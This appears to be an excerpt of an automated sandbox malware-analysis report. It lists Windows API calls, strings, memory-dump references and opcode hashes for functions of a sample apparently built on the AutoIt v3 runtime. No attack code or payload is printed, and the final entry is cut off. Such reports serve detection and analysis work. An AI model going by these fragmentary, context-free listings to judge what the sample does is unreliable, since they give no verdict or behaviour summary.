                                                              • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                              • String ID:
                                                              • API String ID: 2189390790-0
                                                              • Opcode ID: 96fcd859d40ea8efc3d52ca0eae1b0fe039579221a5d0a0a6a44e08fa527dd68
                                                              • Instruction ID: 72a1de4d3ab25d19a94a8820f32751fe10a3066b9e3b00e6e3b44b05d10692a3
                                                              • Opcode Fuzzy Hash: 96fcd859d40ea8efc3d52ca0eae1b0fe039579221a5d0a0a6a44e08fa527dd68
                                                              • Instruction Fuzzy Hash: 8B320474604382EFD728CF24C884B6EB7E0BF92305F14452DF96587291C771EA89DB96

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00C535DE
                                                              • RegisterClassExW.USER32(00000030), ref: 00C53608
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C53619
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 00C53636
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C53646
                                                              • LoadIconW.USER32(000000A9), ref: 00C5365C
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C5366B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: 11303b8c1d8f58b4f755dbd6e55445d711b64e0e72c4814fbcf87981a8e0ad46
                                                              • Instruction ID: 83ec6ceda8689ffa8032ebda80b99d720ba785b79f7a845c8b2ba2ef97d34c1c
                                                              • Opcode Fuzzy Hash: 11303b8c1d8f58b4f755dbd6e55445d711b64e0e72c4814fbcf87981a8e0ad46
                                                              • Instruction Fuzzy Hash: 7C21E5B5941348AFDB10DF94EC89BAD7BB4FB08710F00411AF512EA2A0D7B55685CFA0

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00C9073A: CreateFileW.KERNELBASE(00000000,00000000,?,00C90AA4,?,?,00000000,?,00C90AA4,00000000,0000000C), ref: 00C90757
                                                              • GetLastError.KERNEL32 ref: 00C90B0F
                                                              • __dosmaperr.LIBCMT ref: 00C90B16
                                                              • GetFileType.KERNELBASE(00000000), ref: 00C90B22
                                                              • GetLastError.KERNEL32 ref: 00C90B2C
                                                              • __dosmaperr.LIBCMT ref: 00C90B35
                                                              • CloseHandle.KERNEL32(00000000), ref: 00C90B55
                                                              • CloseHandle.KERNEL32(?), ref: 00C90C9F
                                                              • GetLastError.KERNEL32 ref: 00C90CD1
                                                              • __dosmaperr.LIBCMT ref: 00C90CD8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                              • String ID: H
                                                              • API String ID: 4237864984-2852464175
                                                              • Opcode ID: ea573d0c32ea21a2ab89461e01cd5ff56e2efed7b2a9663d8eaaac2d92e4cf8c
                                                              • Instruction ID: 50c0f94c6028fbdd1e86f46de1e9722d3a3b554583bca611211e75013c3b3239
                                                              • Opcode Fuzzy Hash: ea573d0c32ea21a2ab89461e01cd5ff56e2efed7b2a9663d8eaaac2d92e4cf8c
                                                              • Instruction Fuzzy Hash: C8A12732A042448FDF19AF68D896BAD3BA0EF16324F24415DF821DB3A1DB319913DB51

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00C5551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00C94B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00C55539
                                                                • Part of subcall function 00C551BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C551E1
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C5534B
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C94BD7
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C94C18
                                                              • RegCloseKey.ADVAPI32(?), ref: 00C94C5A
                                                              • _wcslen.LIBCMT ref: 00C94CC1
                                                              • _wcslen.LIBCMT ref: 00C94CD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                              • API String ID: 98802146-2727554177
                                                              • Opcode ID: d1bdf565fc5740420e1b91840e629a6a1fe9a940a3c70d3f54d2e4d49724d908
                                                              • Instruction ID: 91c3ee8cd80a9168e6713384b26afefbe2638f53b0985eb8f11ae33ad0dabe76
                                                              • Opcode Fuzzy Hash: d1bdf565fc5740420e1b91840e629a6a1fe9a940a3c70d3f54d2e4d49724d908
                                                              • Instruction Fuzzy Hash: 20718D71504340AEC724EF69DC8596BBBE8FF68350F80042DF845C72A1EB719B4ACB65

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00C53465
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00C53474
                                                              • LoadIconW.USER32(00000063), ref: 00C5348A
                                                              • LoadIconW.USER32(000000A4), ref: 00C5349C
                                                              • LoadIconW.USER32(000000A2), ref: 00C534AE
                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C534C6
                                                              • RegisterClassExW.USER32(?), ref: 00C53517
                                                                • Part of subcall function 00C535AB: GetSysColorBrush.USER32(0000000F), ref: 00C535DE
                                                                • Part of subcall function 00C535AB: RegisterClassExW.USER32(00000030), ref: 00C53608
                                                                • Part of subcall function 00C535AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C53619
                                                                • Part of subcall function 00C535AB: InitCommonControlsEx.COMCTL32(?), ref: 00C53636
                                                                • Part of subcall function 00C535AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C53646
                                                                • Part of subcall function 00C535AB: LoadIconW.USER32(000000A9), ref: 00C5365C
                                                                • Part of subcall function 00C535AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C5366B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                              • String ID: #$0$AutoIt v3
                                                              • API String ID: 423443420-4155596026
                                                              • Opcode ID: cbef57b8168749be1a0f543f88ac91939a062896b184c38ee97cef131f93c563
                                                              • Instruction ID: d74da0e6ff4a8e2641a0059d2a10df38bd93908741ebb7d225dadfcc28c54f15
                                                              • Opcode Fuzzy Hash: cbef57b8168749be1a0f543f88ac91939a062896b184c38ee97cef131f93c563
                                                              • Instruction Fuzzy Hash: 872119B0900354ABDB20DFA5EC95BA97BB4EB1CB60F00001EF515E63A0D7B955568FA0

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00C57953: CloseHandle.KERNELBASE(?,?,00000000,00C93A1C), ref: 00C57973
                                                                • Part of subcall function 00C56E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00C53B33,?,00008000), ref: 00C56E80
                                                              • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00C53C17
                                                              • _wcslen.LIBCMT ref: 00C53C96
                                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 00C53D81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$CloseCreateFileHandle_wcslen
                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                              • API String ID: 3350465876-3738523708
                                                              • Opcode ID: 6043f49b5a680e503b4676ef4912d7a06f21ad06215d970ffe97ce5239d48a6a
                                                              • Instruction ID: f0b6dd755642733a9cac23ebd924e52d96cb010f5e4835b0bfbdd06ac2b07487
                                                              • Opcode Fuzzy Hash: 6043f49b5a680e503b4676ef4912d7a06f21ad06215d970ffe97ce5239d48a6a
                                                              • Instruction Fuzzy Hash: 6A22AD350083809FCB14EF24C881AAFBBF5BF94345F10491DF896972A2DB70DA89DB56

                                                              Control-flow Graph

                                                              APIs
                                                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00C53690,?,?), ref: 00C536FE
                                                              • KillTimer.USER32(?,00000001,?,?,?,?,?,00C53690,?,?), ref: 00C5372A
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C5374D
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00C53690,?,?), ref: 00C53758
                                                              • CreatePopupMenu.USER32 ref: 00C5376C
                                                              • PostQuitMessage.USER32(00000000), ref: 00C5378D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                              • String ID: TaskbarCreated
                                                              • API String ID: 129472671-2362178303
                                                              • Opcode ID: b3938b4327cd4cf00405290586f0fabdf5c26903bffe7ce9ebe4e3acd0985ce8
                                                              • Instruction ID: df730f5b103b48ab035d926574a615ef48d64feb003ff902446d128663b04716
                                                              • Opcode Fuzzy Hash: b3938b4327cd4cf00405290586f0fabdf5c26903bffe7ce9ebe4e3acd0985ce8
                                                              • Instruction Fuzzy Hash: BF4155B95142C0BBDB245B289D4EB7D3A55E7183D2F000129FD22CE394CB749BCA9639

                                                              Control-flow Graph

                                                              APIs
                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C52A9B
                                                              • CoUninitialize.COMBASE ref: 00C52B3A
                                                              • UnregisterHotKey.USER32(?), ref: 00C52D1F
                                                              • DestroyWindow.USER32(?), ref: 00C939F5
                                                              • FreeLibrary.KERNEL32(?), ref: 00C93A5A
                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C93A87
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                              • String ID: close all
                                                              • API String ID: 469580280-3243417748
                                                              • Opcode ID: bc1521368a7d0c5cf653127cd06a13cd15d2cd0b31da2c3a95ba0088e347353a
                                                              • Instruction ID: 160393644b044d8d8cd8ce7456b13641e002913c4658efab2b076c5d77b3e5f2
                                                              • Opcode Fuzzy Hash: bc1521368a7d0c5cf653127cd06a13cd15d2cd0b31da2c3a95ba0088e347353a
                                                              • Instruction Fuzzy Hash: 31D18E35701252CFCB29EF15C889B29F7A0BF05701F1442ADE84A6B252CB71EE56DF88

                                                              APIs
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CC8907
                                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 00CC891B
                                                              • GetFileAttributesW.KERNEL32(?), ref: 00CC8945
                                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00CC895F
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00CC8971
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00CC89BA
                                                              • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 00CC8A0A
                                                              Strings
                                                              Similarity
                                                              • API ID: CurrentDirectory$AttributesFile
                                                              • String ID: *.*
                                                              • API String ID: 769691225-438819550
                                                              • Opcode ID: ef4084911a23db87e556a39872c54dec06d5f7bb03aeee4bda44eeae07ea4252
                                                              • Instruction ID: 9aca7a1e130c08cea4ea3a7801e1c2336dc717822b33a20ad3926e9098abe0ca
                                                              • Opcode Fuzzy Hash: ef4084911a23db87e556a39872c54dec06d5f7bb03aeee4bda44eeae07ea4252
                                                              • Instruction Fuzzy Hash: EC819C725042009BCB20EF55C494FABB3E8BF84710F54482EF899D7691EB34DA49CB92

                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e73693b04718870c2a1f0aa012e84b976491703f966f6f032b33f1564be78ee6
                                                              • Instruction ID: 034be5ce57deba273edf3166bc35a797c646bc9c2013fc4ec0273f85529533e3
                                                              • Opcode Fuzzy Hash: e73693b04718870c2a1f0aa012e84b976491703f966f6f032b33f1564be78ee6
                                                              • Instruction Fuzzy Hash: 82C1E671A04345AFDB11EFA8D845BBD7BB0FF59304F184199F824A73A2C7309A42DB69
                                                              APIs
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,VARGETTYPE,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C53568
                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C53589
                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C532EF,?), ref: 00C5359D
                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C532EF,?), ref: 00C535A6
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$CreateShow
                                                              • String ID: AutoIt v3$VARGETTYPE$edit
                                                              • API String ID: 1584632944-1624152889
                                                              • Opcode ID: ae0d79ad40049d271ee90f6650289ed4a55f703cd3fd0dbea3980d7975e7fd90
                                                              • Instruction ID: 04ff01021553360936d64117d95cd9b46fe562b8190f51a7757c758a0ef35c5c
                                                              • Opcode Fuzzy Hash: ae0d79ad40049d271ee90f6650289ed4a55f703cd3fd0dbea3980d7975e7fd90
                                                              • Instruction Fuzzy Hash: DCF0FE716403D47AEB3197576C48F373EBDD7DAF50F00002EB905EB260D6691852EAB1
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00C555EB,SwapMouseButtons,00000004,?), ref: 00C5561C
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00C555EB,SwapMouseButtons,00000004,?), ref: 00C5563D
                                                              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00C555EB,SwapMouseButtons,00000004,?), ref: 00C5565F
                                                              Strings
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: Control Panel\Mouse
                                                              • API String ID: 3677997916-824357125
                                                              • Opcode ID: c6fcdd2bc22d84dc3b59c209a15c204720c5416bb0c4ecbdce14d266e2f89a50
                                                              • Instruction ID: 0893f5b8fd704852c4a5a36d3d95638a3b37030927b1813e639cf9fb8c5077bc
                                                              • Opcode Fuzzy Hash: c6fcdd2bc22d84dc3b59c209a15c204720c5416bb0c4ecbdce14d266e2f89a50
                                                              • Instruction Fuzzy Hash: 1F117C79611648FFDB208F64CC80EAF77B8EF00745F444469F806D7220DA719E8597A4
                                                              APIs
                                                              • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00CAE73D
                                                              • FreeLibrary.KERNEL32 ref: 00CAE763
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: GetSystemWow64DirectoryW$X64
                                                              • API String ID: 3013587201-2590602151
                                                              • Opcode ID: 6aba28d735ff7a1c37fd49a598baa9014f1d04503446a162a2a05d07e9c33074
                                                              • Instruction ID: 1295f959afc1e4ebc3a515dcd647bebc54c4b3898edb9bd236e944f789cfc7f2
                                                              • Opcode Fuzzy Hash: 6aba28d735ff7a1c37fd49a598baa9014f1d04503446a162a2a05d07e9c33074
                                                              • Instruction Fuzzy Hash: 86E09B71D059669FDB735A205C98BBD36246F22745F240859F802EA150DB25CD4887D4
                                                              Strings
                                                              • Variable must be of type 'Object'., xrefs: 00CA486A
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Variable must be of type 'Object'.
                                                              • API String ID: 0-109567571
                                                              • Opcode ID: 70a21f4c7d4fdf89cba59772c880e70a2fe29c044f7c604122df4cd3ee99111d
                                                              • Instruction ID: 6cf459135e6db581a03956961b0402721ea917cbc24e6d6993e2b3587cd098ad
                                                              • Opcode Fuzzy Hash: 70a21f4c7d4fdf89cba59772c880e70a2fe29c044f7c604122df4cd3ee99111d
                                                              • Instruction Fuzzy Hash: 8DC2CF75A00205DFCB28CF58C880BAEB7B1FF49305F248169ED15AB361D374AE86DB95
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00CEDC30), ref: 00CBDABB
                                                              • GetLastError.KERNEL32 ref: 00CBDACA
                                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00CBDAD9
                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00CEDC30), ref: 00CBDB36
                                                              Similarity
                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                              • String ID:
                                                              • API String ID: 2267087916-0
                                                              • Opcode ID: 9dccbba6a3e5f0a3718256f7e45b3693e80d2cad4366a02ad3fa86740dde3afe
                                                              • Instruction ID: 3bddcf0737670a7150c9d573aa8748219f2a127f042c256a575973c1394ff3fe
                                                              • Opcode Fuzzy Hash: 9dccbba6a3e5f0a3718256f7e45b3693e80d2cad4366a02ad3fa86740dde3afe
                                                              • Instruction Fuzzy Hash: 882192345082459F8700DF24C8819AFBBE4EF55369F144A1DF8ABC72A1E730DE4ADB56
                                                              APIs
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00C709F8
                                                                • Part of subcall function 00C73634: RaiseException.KERNEL32(?,?,?,00C70A1A,?,00000000,?,?,?,?,?,?,00C70A1A,00000000,00D19758,00000000), ref: 00C73694
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00C70A15
                                                              Strings
                                                              Similarity
                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                              • String ID: Unknown exception
                                                              • API String ID: 3476068407-410509341
                                                              • Opcode ID: 5b6cc5ba4e6deb8f19178faf7bd18da0cb71f5cb14dc066925d0fbbcf2c9cb22
                                                              • Instruction ID: f452b3ad08816cacc256eca4119d4f275413b19f09a3784b7b9f36f10e370a7a
                                                              • Opcode Fuzzy Hash: 5b6cc5ba4e6deb8f19178faf7bd18da0cb71f5cb14dc066925d0fbbcf2c9cb22
                                                              • Instruction Fuzzy Hash: 0FF0683450030DF79B04BAB5EC5699DB76C5E00760BB0C160B92C955D3EB70EB56D7D1
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: LocalTime
                                                              • String ID: %.3d$X64
                                                              • API String ID: 481472006-1077770165
                                                              • Opcode ID: 6ce1720403a2c9d590a9fb67719ff661f0b5526a55567c5f00481025a35d89b9
                                                              • Instruction ID: d790809b8c7ba6cdccb49fba59c8be12551598986420b5e408764600a73d235c
                                                              • Opcode Fuzzy Hash: 6ce1720403a2c9d590a9fb67719ff661f0b5526a55567c5f00481025a35d89b9
                                                              • Instruction Fuzzy Hash: 8ED012A1C0801EE9CBA09AD1E8889BD737CA719304F108853F506D2040EA349548A761
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00CD8C52
                                                              • TerminateProcess.KERNEL32(00000000), ref: 00CD8C59
                                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 00CD8E3A
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentFreeLibraryTerminate
                                                              • String ID:
                                                              • API String ID: 146820519-0
                                                              • Opcode ID: 0a22b4cf6d55f4492f231014e12dcf7319feec0e6f0367cc83f4c37eb7390272
                                                              • Instruction ID: e4b41b8c735738f2e38ac6a61519c3d6cfdb975134f110da15c5f8ce20681fa7
                                                              • Opcode Fuzzy Hash: 0a22b4cf6d55f4492f231014e12dcf7319feec0e6f0367cc83f4c37eb7390272
                                                              • Instruction Fuzzy Hash: 6D125A75A083419FC714DF28C484B2ABBE5FF85314F14895EE9998B392CB31E949CF92
                                                              APIs
                                                                • Part of subcall function 00C53205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C53236
                                                                • Part of subcall function 00C53205: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C5323E
                                                                • Part of subcall function 00C53205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C53249
                                                                • Part of subcall function 00C53205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C53254
                                                                • Part of subcall function 00C53205: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C5325C
                                                                • Part of subcall function 00C53205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C53264
                                                                • Part of subcall function 00C5318C: RegisterWindowMessageW.USER32(00000004,?,00C52906), ref: 00C531E4
                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C529AC
                                                              • OleInitialize.OLE32 ref: 00C529CA
                                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 00C939E7
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                              • String ID:
                                                              • API String ID: 1986988660-0
                                                              • Opcode ID: bf6deada88845f710396bc288384d49452f1be5851b8713c1ad4abd824947e02
                                                              • Instruction ID: 72a1e62e6a184ef65a53bfced8446b965b2f0711b18e3ddd032c4e98e7707854
                                                              • Opcode Fuzzy Hash: bf6deada88845f710396bc288384d49452f1be5851b8713c1ad4abd824947e02
                                                              • Instruction Fuzzy Hash: A171AFB4901344AE87A8EF79EC696357AE0BB78305390822AF419C7372EB308547DF75
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00C56CA1
                                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00C56CB1
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: b9e2a928352bce5da3afa2660672e81a779b082ee0e9bdee55f7ea115cdb17d8
